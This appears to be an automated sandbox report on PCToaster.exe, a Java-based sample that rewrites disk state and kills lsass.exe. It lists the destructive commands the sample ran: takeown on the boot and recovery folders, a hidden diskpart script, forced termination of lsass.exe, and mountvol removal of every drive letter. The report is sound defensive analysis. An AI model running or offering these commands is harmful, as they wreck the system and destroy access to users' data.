Malware Analysis Report

2024-09-11 03:51

Sample ID 240620-r6de9axcpr
Target PCToaster.exe
SHA256 85a58aa96dccd94316a34608ba996656a22c8158d5156b6e454d9d69e6ff38c3
Tags
discovery exploit
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

85a58aa96dccd94316a34608ba996656a22c8158d5156b6e454d9d69e6ff38c3

Threat Level: Likely malicious

The file PCToaster.exe was found to be: Likely malicious.

Malicious Activity Summary

discovery exploit

Possible privilege escalation attempt

Modifies file permissions

Enumerates connected drives

Unsigned PE

Suspicious use of WriteProcessMemory

Suspicious use of SendNotifyMessage

Suspicious use of AdjustPrivilegeToken

Views/modifies file attributes

Suspicious use of SetWindowsHookEx

Checks SCSI registry key(s)

Kills process with taskkill

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

MITRE ATT&CK Matrix V13

Initial Access
TA0001
Execution
TA0002
Persistence
TA0003
Privilege Escalation
TA0004
Defense Evasion
TA0005
File and Directory Permissions Modification
T1222
Hide Artifacts
T1564
Hidden Files and Directories
T1564.001
Credential Access
TA0006
Discovery
TA0007
Query Registry
T1012
Peripheral Device Discovery
T1120
System Information Discovery
T1082
Lateral Movement
TA0008
Collection
TA0009
Exfiltration
TA0010
Command and Control
TA0011
Impact
TA0040
Resource Development
TA0042
Reconnaissance
TA0043

Analysis: static1

Detonation Overview

Reported

2024-06-20 14:47

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-20 14:47

Reported

2024-06-20 14:50

Platform

win7-20231129-en

Max time kernel

121s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PCToaster.exe"

Signatures

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2180 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\PCToaster.exe C:\Program Files\Java\jre7\bin\javaw.exe
PID 2180 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\PCToaster.exe C:\Program Files\Java\jre7\bin\javaw.exe
PID 2180 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\PCToaster.exe C:\Program Files\Java\jre7\bin\javaw.exe
PID 2180 wrote to memory of 2044 N/A C:\Users\Admin\AppData\Local\Temp\PCToaster.exe C:\Program Files\Java\jre7\bin\javaw.exe

Processes

C:\Users\Admin\AppData\Local\Temp\PCToaster.exe

"C:\Users\Admin\AppData\Local\Temp\PCToaster.exe"

C:\Program Files\Java\jre7\bin\javaw.exe

"C:\Program Files\Java\jre7\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Local\Temp\PCToaster.exe"

Network

N/A

Files

memory/2180-0-0x0000000000400000-0x000000000046E000-memory.dmp

memory/2044-3-0x0000000002640000-0x00000000028B0000-memory.dmp

memory/2044-11-0x0000000000230000-0x0000000000231000-memory.dmp

memory/2044-14-0x0000000002640000-0x00000000028B0000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-20 14:47

Reported

2024-06-20 14:50

Platform

win10v2004-20240508-en

Max time kernel

106s

Max time network

55s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PCToaster.exe"

Signatures

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\SYSTEM32\takeown.exe N/A
N/A N/A C:\Windows\SYSTEM32\takeown.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\SYSTEM32\takeown.exe N/A
N/A N/A C:\Windows\SYSTEM32\takeown.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\K: C:\Windows\SYSTEM32\mountvol.exe N/A
File opened (read-only) \??\M: C:\Windows\SYSTEM32\mountvol.exe N/A
File opened (read-only) \??\N: C:\Windows\SYSTEM32\mountvol.exe N/A
File opened (read-only) \??\O: C:\Windows\SYSTEM32\mountvol.exe N/A
File opened (read-only) \??\Q: C:\Windows\SYSTEM32\mountvol.exe N/A
File opened (read-only) \??\V: C:\Windows\SYSTEM32\takeown.exe N/A
File opened (read-only) \??\H: C:\Windows\SYSTEM32\mountvol.exe N/A
File opened (read-only) \??\J: C:\Windows\SYSTEM32\mountvol.exe N/A
File opened (read-only) \??\S: C:\Windows\SYSTEM32\mountvol.exe N/A
File opened (read-only) \??\V: C:\Windows\SYSTEM32\takeown.exe N/A
File opened (read-only) \??\W: C:\Windows\SYSTEM32\mountvol.exe N/A
File opened (read-only) \??\X: C:\Windows\SYSTEM32\mountvol.exe N/A
File opened (read-only) \??\I: C:\Windows\SYSTEM32\mountvol.exe N/A
File opened (read-only) \??\L: C:\Windows\SYSTEM32\mountvol.exe N/A
File opened (read-only) \??\R: C:\Windows\SYSTEM32\mountvol.exe N/A
File opened (read-only) \??\Z: C:\Windows\SYSTEM32\mountvol.exe N/A
File opened (read-only) \??\A: C:\Windows\SYSTEM32\mountvol.exe N/A
File opened (read-only) \??\B: C:\Windows\SYSTEM32\mountvol.exe N/A
File opened (read-only) \??\E: C:\Windows\SYSTEM32\mountvol.exe N/A
File opened (read-only) \??\U: C:\Windows\SYSTEM32\mountvol.exe N/A
File opened (read-only) \??\Y: C:\Windows\SYSTEM32\mountvol.exe N/A
File opened (read-only) \??\G: C:\Windows\SYSTEM32\mountvol.exe N/A
File opened (read-only) \??\P: C:\Windows\SYSTEM32\mountvol.exe N/A
File opened (read-only) \??\T: C:\Windows\SYSTEM32\mountvol.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName C:\Windows\System32\vds.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 C:\Windows\System32\vds.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\System32\vds.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Windows\System32\vds.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\taskkill.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SYSTEM32\takeown.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: 33 N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SYSTEM32\taskkill.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Java\jre-1.8\bin\javaw.exe N/A
N/A N/A C:\Program Files\Java\jre-1.8\bin\javaw.exe N/A
N/A N/A C:\Program Files\Java\jre-1.8\bin\javaw.exe N/A
N/A N/A C:\Program Files\Java\jre-1.8\bin\javaw.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4504 wrote to memory of 3976 N/A C:\Users\Admin\AppData\Local\Temp\PCToaster.exe C:\Program Files\Java\jre-1.8\bin\javaw.exe
PID 4504 wrote to memory of 3976 N/A C:\Users\Admin\AppData\Local\Temp\PCToaster.exe C:\Program Files\Java\jre-1.8\bin\javaw.exe
PID 3976 wrote to memory of 2228 N/A C:\Program Files\Java\jre-1.8\bin\javaw.exe C:\Windows\system32\icacls.exe
PID 3976 wrote to memory of 2228 N/A C:\Program Files\Java\jre-1.8\bin\javaw.exe C:\Windows\system32\icacls.exe
PID 3976 wrote to memory of 440 N/A C:\Program Files\Java\jre-1.8\bin\javaw.exe C:\Windows\SYSTEM32\attrib.exe
PID 3976 wrote to memory of 440 N/A C:\Program Files\Java\jre-1.8\bin\javaw.exe C:\Windows\SYSTEM32\attrib.exe
PID 3976 wrote to memory of 688 N/A C:\Program Files\Java\jre-1.8\bin\javaw.exe C:\Windows\SYSTEM32\diskpart.exe
PID 3976 wrote to memory of 688 N/A C:\Program Files\Java\jre-1.8\bin\javaw.exe C:\Windows\SYSTEM32\diskpart.exe
PID 3976 wrote to memory of 3780 N/A C:\Program Files\Java\jre-1.8\bin\javaw.exe C:\Windows\SYSTEM32\takeown.exe
PID 3976 wrote to memory of 3780 N/A C:\Program Files\Java\jre-1.8\bin\javaw.exe C:\Windows\SYSTEM32\takeown.exe
PID 3976 wrote to memory of 4980 N/A C:\Program Files\Java\jre-1.8\bin\javaw.exe C:\Windows\SYSTEM32\takeown.exe
PID 3976 wrote to memory of 4980 N/A C:\Program Files\Java\jre-1.8\bin\javaw.exe C:\Windows\SYSTEM32\takeown.exe
PID 3976 wrote to memory of 3708 N/A C:\Program Files\Java\jre-1.8\bin\javaw.exe C:\Windows\SYSTEM32\taskkill.exe
PID 3976 wrote to memory of 3708 N/A C:\Program Files\Java\jre-1.8\bin\javaw.exe C:\Windows\SYSTEM32\taskkill.exe
PID 3976 wrote to memory of 776 N/A C:\Program Files\Java\jre-1.8\bin\javaw.exe C:\Windows\SYSTEM32\mountvol.exe
PID 3976 wrote to memory of 776 N/A C:\Program Files\Java\jre-1.8\bin\javaw.exe C:\Windows\SYSTEM32\mountvol.exe
PID 3976 wrote to memory of 3524 N/A C:\Program Files\Java\jre-1.8\bin\javaw.exe C:\Windows\SYSTEM32\mountvol.exe
PID 3976 wrote to memory of 3524 N/A C:\Program Files\Java\jre-1.8\bin\javaw.exe C:\Windows\SYSTEM32\mountvol.exe
PID 3976 wrote to memory of 4620 N/A C:\Program Files\Java\jre-1.8\bin\javaw.exe C:\Windows\SYSTEM32\mountvol.exe
PID 3976 wrote to memory of 4620 N/A C:\Program Files\Java\jre-1.8\bin\javaw.exe C:\Windows\SYSTEM32\mountvol.exe
PID 3976 wrote to memory of 5000 N/A C:\Program Files\Java\jre-1.8\bin\javaw.exe C:\Windows\SYSTEM32\mountvol.exe
PID 3976 wrote to memory of 5000 N/A C:\Program Files\Java\jre-1.8\bin\javaw.exe C:\Windows\SYSTEM32\mountvol.exe
PID 3976 wrote to memory of 4396 N/A C:\Program Files\Java\jre-1.8\bin\javaw.exe C:\Windows\SYSTEM32\mountvol.exe
PID 3976 wrote to memory of 4396 N/A C:\Program Files\Java\jre-1.8\bin\javaw.exe C:\Windows\SYSTEM32\mountvol.exe
PID 3976 wrote to memory of 3532 N/A C:\Program Files\Java\jre-1.8\bin\javaw.exe C:\Windows\SYSTEM32\mountvol.exe
PID 3976 wrote to memory of 3532 N/A C:\Program Files\Java\jre-1.8\bin\javaw.exe C:\Windows\SYSTEM32\mountvol.exe
PID 3976 wrote to memory of 1408 N/A C:\Program Files\Java\jre-1.8\bin\javaw.exe C:\Windows\SYSTEM32\mountvol.exe
PID 3976 wrote to memory of 1408 N/A C:\Program Files\Java\jre-1.8\bin\javaw.exe C:\Windows\SYSTEM32\mountvol.exe
PID 3976 wrote to memory of 2344 N/A C:\Program Files\Java\jre-1.8\bin\javaw.exe C:\Windows\SYSTEM32\mountvol.exe
PID 3976 wrote to memory of 2344 N/A C:\Program Files\Java\jre-1.8\bin\javaw.exe C:\Windows\SYSTEM32\mountvol.exe
PID 3976 wrote to memory of 3088 N/A C:\Program Files\Java\jre-1.8\bin\javaw.exe C:\Windows\SYSTEM32\mountvol.exe
PID 3976 wrote to memory of 3088 N/A C:\Program Files\Java\jre-1.8\bin\javaw.exe C:\Windows\SYSTEM32\mountvol.exe
PID 3976 wrote to memory of 2904 N/A C:\Program Files\Java\jre-1.8\bin\javaw.exe C:\Windows\SYSTEM32\mountvol.exe
PID 3976 wrote to memory of 2904 N/A C:\Program Files\Java\jre-1.8\bin\javaw.exe C:\Windows\SYSTEM32\mountvol.exe
PID 3976 wrote to memory of 3604 N/A C:\Program Files\Java\jre-1.8\bin\javaw.exe C:\Windows\SYSTEM32\mountvol.exe
PID 3976 wrote to memory of 3604 N/A C:\Program Files\Java\jre-1.8\bin\javaw.exe C:\Windows\SYSTEM32\mountvol.exe
PID 3976 wrote to memory of 2028 N/A C:\Program Files\Java\jre-1.8\bin\javaw.exe C:\Windows\SYSTEM32\mountvol.exe
PID 3976 wrote to memory of 2028 N/A C:\Program Files\Java\jre-1.8\bin\javaw.exe C:\Windows\SYSTEM32\mountvol.exe
PID 3976 wrote to memory of 5100 N/A C:\Program Files\Java\jre-1.8\bin\javaw.exe C:\Windows\SYSTEM32\mountvol.exe
PID 3976 wrote to memory of 5100 N/A C:\Program Files\Java\jre-1.8\bin\javaw.exe C:\Windows\SYSTEM32\mountvol.exe
PID 3976 wrote to memory of 5116 N/A C:\Program Files\Java\jre-1.8\bin\javaw.exe C:\Windows\SYSTEM32\mountvol.exe
PID 3976 wrote to memory of 5116 N/A C:\Program Files\Java\jre-1.8\bin\javaw.exe C:\Windows\SYSTEM32\mountvol.exe
PID 3976 wrote to memory of 5012 N/A C:\Program Files\Java\jre-1.8\bin\javaw.exe C:\Windows\SYSTEM32\mountvol.exe
PID 3976 wrote to memory of 5012 N/A C:\Program Files\Java\jre-1.8\bin\javaw.exe C:\Windows\SYSTEM32\mountvol.exe
PID 3976 wrote to memory of 3732 N/A C:\Program Files\Java\jre-1.8\bin\javaw.exe C:\Windows\SYSTEM32\mountvol.exe
PID 3976 wrote to memory of 3732 N/A C:\Program Files\Java\jre-1.8\bin\javaw.exe C:\Windows\SYSTEM32\mountvol.exe
PID 3976 wrote to memory of 4520 N/A C:\Program Files\Java\jre-1.8\bin\javaw.exe C:\Windows\SYSTEM32\mountvol.exe
PID 3976 wrote to memory of 4520 N/A C:\Program Files\Java\jre-1.8\bin\javaw.exe C:\Windows\SYSTEM32\mountvol.exe
PID 3976 wrote to memory of 4956 N/A C:\Program Files\Java\jre-1.8\bin\javaw.exe C:\Windows\SYSTEM32\mountvol.exe
PID 3976 wrote to memory of 4956 N/A C:\Program Files\Java\jre-1.8\bin\javaw.exe C:\Windows\SYSTEM32\mountvol.exe
PID 3976 wrote to memory of 728 N/A C:\Program Files\Java\jre-1.8\bin\javaw.exe C:\Windows\SYSTEM32\mountvol.exe
PID 3976 wrote to memory of 728 N/A C:\Program Files\Java\jre-1.8\bin\javaw.exe C:\Windows\SYSTEM32\mountvol.exe
PID 3976 wrote to memory of 4472 N/A C:\Program Files\Java\jre-1.8\bin\javaw.exe C:\Windows\SYSTEM32\mountvol.exe
PID 3976 wrote to memory of 4472 N/A C:\Program Files\Java\jre-1.8\bin\javaw.exe C:\Windows\SYSTEM32\mountvol.exe
PID 3976 wrote to memory of 3220 N/A C:\Program Files\Java\jre-1.8\bin\javaw.exe C:\Windows\SYSTEM32\mountvol.exe
PID 3976 wrote to memory of 3220 N/A C:\Program Files\Java\jre-1.8\bin\javaw.exe C:\Windows\SYSTEM32\mountvol.exe
PID 3976 wrote to memory of 232 N/A C:\Program Files\Java\jre-1.8\bin\javaw.exe C:\Windows\SYSTEM32\mountvol.exe
PID 3976 wrote to memory of 232 N/A C:\Program Files\Java\jre-1.8\bin\javaw.exe C:\Windows\SYSTEM32\mountvol.exe
PID 3976 wrote to memory of 2308 N/A C:\Program Files\Java\jre-1.8\bin\javaw.exe C:\Windows\SYSTEM32\mountvol.exe
PID 3976 wrote to memory of 2308 N/A C:\Program Files\Java\jre-1.8\bin\javaw.exe C:\Windows\SYSTEM32\mountvol.exe
PID 3976 wrote to memory of 3848 N/A C:\Program Files\Java\jre-1.8\bin\javaw.exe C:\Windows\SYSTEM32\mountvol.exe
PID 3976 wrote to memory of 3848 N/A C:\Program Files\Java\jre-1.8\bin\javaw.exe C:\Windows\SYSTEM32\mountvol.exe
PID 3976 wrote to memory of 860 N/A C:\Program Files\Java\jre-1.8\bin\javaw.exe C:\Windows\SYSTEM32\mountvol.exe
PID 3976 wrote to memory of 860 N/A C:\Program Files\Java\jre-1.8\bin\javaw.exe C:\Windows\SYSTEM32\mountvol.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\PCToaster.exe

"C:\Users\Admin\AppData\Local\Temp\PCToaster.exe"

C:\Program Files\Java\jre-1.8\bin\javaw.exe

"C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Local\Temp\PCToaster.exe"

C:\Windows\system32\icacls.exe

C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M

C:\Windows\SYSTEM32\attrib.exe

attrib +h C:\Users\Admin\AppData\Local\Temp\scr.txt

C:\Windows\SYSTEM32\diskpart.exe

diskpart /s C:\Users\Admin\AppData\Local\Temp\scr.txt

C:\Windows\System32\vdsldr.exe

C:\Windows\System32\vdsldr.exe -Embedding

C:\Windows\System32\vds.exe

C:\Windows\System32\vds.exe

C:\Windows\SYSTEM32\takeown.exe

takeown /f V:\Boot /r

C:\Windows\SYSTEM32\takeown.exe

takeown /f V:\Recovery /r

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost

C:\Windows\SYSTEM32\taskkill.exe

taskkill /im lsass.exe /f

C:\Windows\SYSTEM32\mountvol.exe

mountvol A: /d

C:\Windows\SYSTEM32\mountvol.exe

mountvol B: /d

C:\Windows\SYSTEM32\mountvol.exe

mountvol D: /d

C:\Windows\SYSTEM32\mountvol.exe

mountvol E: /d

C:\Windows\SYSTEM32\mountvol.exe

mountvol F: /d

C:\Windows\SYSTEM32\mountvol.exe

mountvol G: /d

C:\Windows\SYSTEM32\mountvol.exe

mountvol H: /d

C:\Windows\SYSTEM32\mountvol.exe

mountvol I: /d

C:\Windows\SYSTEM32\mountvol.exe

mountvol J: /d

C:\Windows\SYSTEM32\mountvol.exe

mountvol K: /d

C:\Windows\SYSTEM32\mountvol.exe

mountvol L: /d

C:\Windows\SYSTEM32\mountvol.exe

mountvol M: /d

C:\Windows\SYSTEM32\mountvol.exe

mountvol N: /d

C:\Windows\SYSTEM32\mountvol.exe

mountvol O: /d

C:\Windows\SYSTEM32\mountvol.exe

mountvol P: /d

C:\Windows\SYSTEM32\mountvol.exe

mountvol Q: /d

C:\Windows\SYSTEM32\mountvol.exe

mountvol R: /d

C:\Windows\SYSTEM32\mountvol.exe

mountvol S: /d

C:\Windows\SYSTEM32\mountvol.exe

mountvol T: /d

C:\Windows\SYSTEM32\mountvol.exe

mountvol U: /d

C:\Windows\SYSTEM32\mountvol.exe

mountvol V: /d

C:\Windows\SYSTEM32\mountvol.exe

mountvol W: /d

C:\Windows\SYSTEM32\mountvol.exe

mountvol X: /d

C:\Windows\SYSTEM32\mountvol.exe

mountvol Y: /d

C:\Windows\SYSTEM32\mountvol.exe

mountvol Z: /d

C:\Windows\SYSTEM32\mountvol.exe

mountvol C: /d

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
N/A 239.255.255.250:3702 udp
US 8.8.8.8:53 c.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.2.0.f.f.ip6.arpa udp
N/A 239.255.255.250:3702 udp

Files

memory/4504-0-0x0000000000400000-0x000000000046E000-memory.dmp

memory/3976-3-0x000002A093350000-0x000002A0935C0000-memory.dmp

C:\ProgramData\Oracle\Java\.oracle_jre_usage\3903daac9bc4a3b7.timestamp

MD5 ce0f4cdd8c73e8bfdd8f7c36fc51989c
SHA1 cbfee3a71a6a4a269105b87f90d7f38a45c3da0b
SHA256 a9aaac48e94fd8b5e296ccd99e2a4d73639f7c2b3b2c35bc02e8fc6cb5040856
SHA512 0a597b9a1a26193041e911f29b688db8015e28de713030832818d27e536d28f033a20aa44a4f994d31903ba8adfb2d8d6548018d4fac45dbd9eb2a49bda7be16

C:\Users\Admin\AppData\Local\Temp\scr.txt

MD5 ad1869d6f0b2b809394605d3e73eeb74
SHA1 4bdedd14bfea9f891b98c4cc82c5f82a58df67f6
SHA256 7e9cde40095f2a877375cb30fecd4f64cf328e3ab11baed5242f73cbb94bd394
SHA512 8fe0f269daf94feaa246a644dbeeda52916855f1d2bfd2c6c876c7c9c80b0ceb7e42caf0b64a70bda9a64d4529b885aaa38998a515d6abbe88ad367e72324136

memory/3976-24-0x000002A091A80000-0x000002A091A81000-memory.dmp

memory/3976-27-0x000002A091A80000-0x000002A091A81000-memory.dmp

memory/3976-30-0x000002A091A80000-0x000002A091A81000-memory.dmp

memory/3976-33-0x000002A091A80000-0x000002A091A81000-memory.dmp

memory/3976-35-0x000002A091A80000-0x000002A091A81000-memory.dmp

memory/3212-42-0x0000017B3DB60000-0x0000017B3DB61000-memory.dmp

memory/3212-43-0x0000017B3DB60000-0x0000017B3DB61000-memory.dmp

memory/3212-44-0x0000017B3DB60000-0x0000017B3DB61000-memory.dmp

memory/3212-54-0x0000017B3DB60000-0x0000017B3DB61000-memory.dmp

memory/3212-53-0x0000017B3DB60000-0x0000017B3DB61000-memory.dmp

memory/3212-52-0x0000017B3DB60000-0x0000017B3DB61000-memory.dmp

memory/3212-51-0x0000017B3DB60000-0x0000017B3DB61000-memory.dmp

memory/3212-50-0x0000017B3DB60000-0x0000017B3DB61000-memory.dmp

memory/3212-49-0x0000017B3DB60000-0x0000017B3DB61000-memory.dmp

memory/3212-48-0x0000017B3DB60000-0x0000017B3DB61000-memory.dmp

memory/3976-55-0x000002A093350000-0x000002A0935C0000-memory.dmp

memory/3976-58-0x000002A091A80000-0x000002A091A81000-memory.dmp

memory/3976-79-0x000002A091A80000-0x000002A091A81000-memory.dmp

memory/3976-96-0x000002A091A80000-0x000002A091A81000-memory.dmp

memory/3976-99-0x000002A091A80000-0x000002A091A81000-memory.dmp

memory/3976-103-0x000002A091A80000-0x000002A091A81000-memory.dmp

memory/3976-104-0x000002A091A80000-0x000002A091A81000-memory.dmp

memory/3976-106-0x000002A091A80000-0x000002A091A81000-memory.dmp

memory/3976-109-0x000002A091A80000-0x000002A091A81000-memory.dmp

memory/3976-114-0x000002A091A80000-0x000002A091A81000-memory.dmp

memory/3976-115-0x000002A091A80000-0x000002A091A81000-memory.dmp